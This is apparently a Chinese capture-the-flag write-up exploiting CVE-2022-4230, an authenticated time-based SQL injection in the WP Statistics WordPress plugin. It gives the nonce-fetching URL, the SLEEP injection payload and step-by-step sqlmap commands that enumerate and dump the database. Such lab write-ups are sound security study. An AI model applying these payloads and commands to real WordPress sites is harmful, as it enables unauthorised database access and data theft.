CVE-2022-4230

打开什么都没有

使用dirsearch扫描到一个wp-admin

访问wp-admin是一个登陆页面

账号密码都在标题中

登陆后是这个页面

在WP Statistics < 13.2.9 -- 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com)中,里边有一段对漏洞的描述。

https://wpscan.com/vulnerability/a0e40cfd-b217-481c-8fc4-027a0a023312/

Log in as a user allowed to View WP Statistic and get a nonce via

https://example.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URL below, which will be delayed by 5s:

http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE\&name=words\&search_engine=aaa' AND (SELECT 5671 FROM (SELECT(SLEEP(5)))Mdgs)--%20HsBR

翻译一下就是

以允许查看WP统计信息的用户身份登录,并通过获取随机数

https://example.com/wp-admin/admin-ajax.php?action=rest-nonce

并在下面的URL中使用它,该URL将延迟5s

首先通过访问(必须要先登录过后台才行)

访问admin-ajax.php?action=rest-nonce

获得随机数706973b8cb

用浏览器访问,查看一下效果,其中 _wpnonce 的值是上面刚刚获取的随机数

访问:

wp-json/wp-statistics/v2/metabox?_wpnonce=63d5d76be3&name=words&search_engine=aaa

使用bp抓包,右键复制文件到本地

使用sqlmap,爆数据库

Python sqlmap.py -r 保存的文件名 --batch -dbs

爆出来四个库,其中的wordpress库很可疑

爆表

Python sqlmap.py -r 1.txt(保存的文件名) -D wordpress(库名) --tables --batch

爆字段

sqlmap -r 1.txt(保存的文件名) --batch -D wordpress(库名) -T flag(表名) --columns

爆字段数据

Python sqlmap.py -r 1.txt(保存的文件名) --batch

-D wordpress(库名) -T flag(表名) -C flag(字段名) --dump

或者直接省略爆字段名和字段数据直接使用下边的,知道表名就可以得出flag

python sqlmap.py -r 1.txt(保存的文件名) -D atomcms(库名) -T flag(表名) --dump -v --batch

相关推荐
湮w2 天前
JavaWeb(三)JavaScript详细讲解
java·javascript·web
还是鼠鼠2 天前
AI掘金头条新闻系统 (Toutiao News)-缓存相关推荐新闻
后端·python·mysql·fastapi·web
曲幽3 天前
从卡顿到丝滑:FastAPI 调用外部 API 的正确姿势(httpx 实战)
python·fastapi·web·async·httpx·client·await·requests·aiohttp
还是鼠鼠6 天前
AI掘金头条新闻系统 (Toutiao News)-缓存新闻详情
后端·python·mysql·fastapi·web
曲幽11 天前
你的REST接口还在“过度投喂”数据吗?——FastAPI + GraphQL实战避坑指南
python·fastapi·web·graphql·route·cors·rest·strawberry
带刺的坐椅13 天前
Spring Boot → Solon 注解迁移实战指南:一张对照表说清楚
java·springboot·web·solon
曲幽17 天前
刚部署的 LibreTranslate 频频翻车?我掏出了 20 年前的 StarDict 词典,用 FastAPI 搭了个本地词典翻译 API
python·fastapi·web·translate·goldendict·libretranslate·stardict·pystardict
曲幽18 天前
别再用网页翻译看源码了!你的私人翻译神器LibreTranslate,部署避坑指南来了
python·docker·web·pot·translate·libretranslate·arogstranslate
llz_11224 天前
web-第四次课后作业
前端·spring boot·web
天山@1231 个月前
电商系统Web渗透测试实战学习笔记
web·电商系统